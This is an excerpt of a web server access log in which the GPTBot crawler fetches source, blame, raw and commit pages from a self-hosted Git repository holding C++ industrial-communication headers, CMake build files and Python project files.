"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:16:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html?display=source" [Client 74.7.227.38] [Length 34921] [Gzip 9.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:16:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_Final.spec" [Client 74.7.227.38] [Length 25887] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 31693] [Gzip 6.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11431] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13130] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12017] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11822] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10810] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12509] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43113] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21751] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12897] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10524] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11520] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12759] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13129] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12702] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:16:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:16:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore?display=source" [Client 74.7.227.38] [Length 11095] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" -[17/Feb/2026:16:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10435] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 